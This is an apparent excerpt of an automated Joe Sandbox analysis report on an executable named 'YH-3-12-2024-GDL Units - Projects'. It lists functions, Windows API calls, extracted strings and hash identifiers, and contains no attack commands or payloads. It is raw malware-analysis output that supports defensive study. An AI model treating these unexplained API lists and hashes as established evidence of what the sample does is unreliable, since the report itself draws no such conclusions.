                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: 1996447a9d608aaaf4ed76124227db2449cc79e6716659c61f4b773072fe6928
                                                        • Instruction ID: 6d9e78847c9c2f88f9d9a65f1133ff4d768c288b82ce9477c6199cf1abfab846
                                                        • Opcode Fuzzy Hash: 1996447a9d608aaaf4ed76124227db2449cc79e6716659c61f4b773072fe6928
                                                        • Instruction Fuzzy Hash: F19179302007049BCB04EF24C459B6EB7E1FF95354F05886CE9969B3A2CB34ED8ACB81
                                                        Function 0084C1AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 229windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0084C1FC
                                                        • GetFocus.USER32 ref: 0084C20C
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0084C217
                                                        • _memset.LIBCMT ref: 0084C342
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0084C36D
                                                        • GetMenuItemCount.USER32(?), ref: 0084C38D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0084C3A0
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0084C3D4
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0084C41C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0084C454
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0084C489
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0$0R
                                                        • API String ID: 1296962147-488941688
                                                        • Opcode ID: d5c9ddc5d9f99481c6b0888fe0c3161ba07f0c630ed12767d71555e1beaf3953
                                                        • Instruction ID: 4c3287f30eb94f1c3aa99fd42dff62aabd32d9af370bce6b6ec1c8d7bef8f737
                                                        • Opcode Fuzzy Hash: d5c9ddc5d9f99481c6b0888fe0c3161ba07f0c630ed12767d71555e1beaf3953
                                                        • Instruction Fuzzy Hash: 4A81BF7020A319AFD750DF14C984A7BBBE8FB88314F00492EFA95D7292D770D905CBA2
                                                        Function 0084B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0084B8B4
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00846B11,?), ref: 0084B910
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0084B949
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0084B98C
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0084B9C3
                                                        • FreeLibrary.KERNEL32(?), ref: 0084B9CF
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0084B9DF
                                                        • DestroyIcon.USER32(?), ref: 0084B9EE
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0084BA0B
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0084BA17
                                                          • Part of subcall function 007E2EFD: __wcsicmp_l.LIBCMT ref: 007E2F86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 1212759294-1154884017
                                                        • Opcode ID: 5df2ba8816b25270d74dcedaf7942b93d07688ac5ad1a745d8f37ab2b55f16d4
                                                        • Instruction ID: 9f30bdd5fa0bf8123a5f179ab0c42bb8a0fecff86fcb3cfda48b02d0cb0b7c93
                                                        • Opcode Fuzzy Hash: 5df2ba8816b25270d74dcedaf7942b93d07688ac5ad1a745d8f37ab2b55f16d4
                                                        • Instruction Fuzzy Hash: E961BD71940219BAEB14DF64CC45FBA7BACFB08720F104119FA15D61D2EB78D991DBA0
                                                        Function 0082DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 0082DCDC
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0082DCEC
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0082DCF8
                                                        • __wsplitpath.LIBCMT ref: 0082DD56
                                                        • _wcscat.LIBCMT ref: 0082DD6E
                                                        • _wcscat.LIBCMT ref: 0082DD80
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0082DD95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DDA9
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DDDB
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DDFC
                                                        • _wcscpy.LIBCMT ref: 0082DE08
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0082DE47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: 9839ec46b76dd821f91a09838b2932526ce6a62ec259878dd9cf7541e019a137
                                                        • Instruction ID: 77cc04db575fa4c615cb9942975e5fc6f1c821aa100a65044f03265eba3a42df
                                                        • Opcode Fuzzy Hash: 9839ec46b76dd821f91a09838b2932526ce6a62ec259878dd9cf7541e019a137
                                                        • Instruction Fuzzy Hash: F86169765043559FCB10EF20D848EAEB7E8FF89314F04892DEA89C7251DB35E985CB92
                                                        Function 007C201B Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007C2036,?,00000000,?,?,?,?,007C16CB,00000000,?), ref: 007C1B9A
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007C20D3
                                                        • KillTimer.USER32(-00000001,?,?,?,?,007C16CB,00000000,?,?,007C1AE2,?,?), ref: 007C216E
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 007FBCA6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007C16CB,00000000,?,?,007C1AE2,?,?), ref: 007FBCD7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007C16CB,00000000,?,?,007C1AE2,?,?), ref: 007FBCEE
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007C16CB,00000000,?,?,007C1AE2,?,?), ref: 007FBD0A
                                                        • DeleteObject.GDI32(00000000), ref: 007FBD1C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID: 0R
                                                        • API String ID: 641708696-1916035689
                                                        • Opcode ID: dcdaf1305b62c9cc9f5bae78e376a37a7824d619c3aaf6affb846d75c86ad086
                                                        • Instruction ID: c21a9bc563ae6b01693cf3e240f91827c7ed8136367adf0d5be00591f8f11621
                                                        • Opcode Fuzzy Hash: dcdaf1305b62c9cc9f5bae78e376a37a7824d619c3aaf6affb846d75c86ad086
                                                        • Instruction Fuzzy Hash: 44619035210A04DFDB35AF18D948B3A77F1FF41312F54852EE6428A672C778A892DF51
                                                        Function 0082A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • CharLowerBuffW.USER32(?,?), ref: 0082A3CB
                                                        • GetDriveTypeW.KERNEL32 ref: 0082A418
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0082A460
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0082A497
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0082A4C5
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: 896769efe92ab0a50e9d7d90c61ef01cf52242c741abc8bb2fdb6931a680bcca
                                                        • Instruction ID: cdbc6019819a8b75f3de911fe061fbb81f6bf23f24857cd5513e246938d1c5af
                                                        • Opcode Fuzzy Hash: 896769efe92ab0a50e9d7d90c61ef01cf52242c741abc8bb2fdb6931a680bcca
                                                        • Instruction Fuzzy Hash: E4513A71104205DFC704EF10C889E6AB7E4FF98718F00886DF89A97261DB75ED4ACB92
                                                        Function 0081F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,007FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0081F8DF
                                                        • LoadStringW.USER32(00000000,?,007FE029,00000001), ref: 0081F8E8
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • GetModuleHandleW.KERNEL32(00000000,00885310,?,00000FFF,?,?,007FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0081F90A
                                                        • LoadStringW.USER32(00000000,?,007FE029,00000001), ref: 0081F90D
                                                        • __swprintf.LIBCMT ref: 0081F95D
                                                        • __swprintf.LIBCMT ref: 0081F96E
                                                        • _wprintf.LIBCMT ref: 0081FA17
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0081FA2E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 984253442-2268648507
                                                        • Opcode ID: 303ed97bc0687277ec4309387d19f1ad76e2032487336abdd60c0eefad3478cf
                                                        • Instruction ID: 430c7633eb664eeb8756ac8b44cf19decf6973719a04398fe8280a1f55b4ebc9
                                                        • Opcode Fuzzy Hash: 303ed97bc0687277ec4309387d19f1ad76e2032487336abdd60c0eefad3478cf
                                                        • Instruction Fuzzy Hash: E3413E72904119EACB14FBE4DD4AEEE777CEF18310F500069B605B2092EE396F49CB61
                                                        Function 007C21A5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • GetSysColor.USER32(0000000F), ref: 007C21D3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID: 0R
                                                        • API String ID: 259745315-1916035689
                                                        • Opcode ID: c946608561e653c3e68125a4553786c28878b0e4945e27f60cb616ac7b87a419
                                                        • Instruction ID: 5208fbaac001190be88a16bd95165f079261f8b3b46de024f5e77b079c322dd6
                                                        • Opcode Fuzzy Hash: c946608561e653c3e68125a4553786c28878b0e4945e27f60cb616ac7b87a419
                                                        • Instruction Fuzzy Hash: 70416D35100544DADB259F28EC88FB93B65FB06331F1A426DFE658A1E7D7358C42DB21
                                                        Function 0084BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0084BA56
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0084BA6D
                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0084BA78
                                                        • CloseHandle.KERNEL32(00000000), ref: 0084BA85
                                                        • GlobalLock.KERNEL32(00000000), ref: 0084BA8E
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0084BA9D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0084BAA6
                                                        • CloseHandle.KERNEL32(00000000), ref: 0084BAAD
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0084BABE
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00852CAC,?), ref: 0084BAD7
                                                        • GlobalFree.KERNEL32(00000000), ref: 0084BAE7
                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0084BB0B
                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0084BB36
                                                        • DeleteObject.GDI32(00000000), ref: 0084BB5E
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0084BB74
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: d7522796b69a4e8511fe7732fbe2af49ac424b773a7baa1f6dedc94695401771
                                                        • Instruction ID: f91401d94f27a6f8d846cf022090b7957d05dc84a3dea88a357e4490d1eb7641
                                                        • Opcode Fuzzy Hash: d7522796b69a4e8511fe7732fbe2af49ac424b773a7baa1f6dedc94695401771
                                                        • Instruction Fuzzy Hash: 82412979601218EFDB11DF65DC88EABBBB8FB8A721F104068FA09D7261D7709D01DB60
                                                        Function 0082D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 0082DA10
                                                        • _wcscat.LIBCMT ref: 0082DA28
                                                        • _wcscat.LIBCMT ref: 0082DA3A
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0082DA4F
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DA63
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0082DA7B
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0082DA95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DAA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                        • String ID: *.*
                                                        • API String ID: 34673085-438819550
                                                        • Opcode ID: 5c2668a2e3c4338d4ee9f4c6809ae907c1b31e0ed95e00f1a21c6a2b37973419
                                                        • Instruction ID: a9a97ef44d2174a6b99ed752d2932ce2dd67f799065636525d1ef8e61472e899
                                                        • Opcode Fuzzy Hash: 5c2668a2e3c4338d4ee9f4c6809ae907c1b31e0ed95e00f1a21c6a2b37973419
                                                        • Instruction Fuzzy Hash: 8E81BF715083649FCB20DF64D844AAABFE8FF89314F14882EF889CB251E634D9C5CB52
                                                        Function 00846F23 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00846FA5
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00846FA8
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00846FCC
                                                        • _memset.LIBCMT ref: 00846FDD
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00846FEF
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00847067
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID: 0R
                                                        • API String ID: 830647256-1916035689
                                                        • Opcode ID: 42bb75bf0b02fa32bdd742dd3afb24961358ec607c63651fb2467257ff13fccd
                                                        • Instruction ID: 1c2770b9e149479f13e169ddb369cc5fe5f8d080b29183e500c43963fe50b58c
                                                        • Opcode Fuzzy Hash: 42bb75bf0b02fa32bdd742dd3afb24961358ec607c63651fb2467257ff13fccd
                                                        • Instruction Fuzzy Hash: 23615A75900248AFDB11DFA8CC81EEE77B8FB09710F10416AFA14EB2A1D775AD45DB90
                                                        Function 0083731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0083738F
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0083739B
                                                        • CreateCompatibleDC.GDI32(?), ref: 008373A7
                                                        • SelectObject.GDI32(00000000,?), ref: 008373B4
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00837408
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00837444
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00837468
                                                        • SelectObject.GDI32(00000006,?), ref: 00837470
                                                        • DeleteObject.GDI32(?), ref: 00837479
                                                        • DeleteDC.GDI32(00000006), ref: 00837480
                                                        • ReleaseDC.USER32(00000000,?), ref: 0083748B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: add2ddd24a3c13dc0f104c7ac653ad540150626ab38ba1421240faae9cbbbce1
                                                        • Instruction ID: 0a3b405d2e27b1605908ac9c9bb710d4abf5bc406729c89f4c1ba3182121a275
                                                        • Opcode Fuzzy Hash: add2ddd24a3c13dc0f104c7ac653ad540150626ab38ba1421240faae9cbbbce1
                                                        • Instruction Fuzzy Hash: 35513CB5904209EFCB24CFA8CC85AAEBBB9FF89310F14842DF95997211C775A940CB90
                                                        Function 007C6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007E0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007C6B0C,?,00008000), ref: 007E0973
                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007C6BAD
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C6CFA
                                                          • Part of subcall function 007C586D: _wcscpy.LIBCMT ref: 007C58A5
                                                          • Part of subcall function 007E363D: _iswctype.LIBCMT ref: 007E3645
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
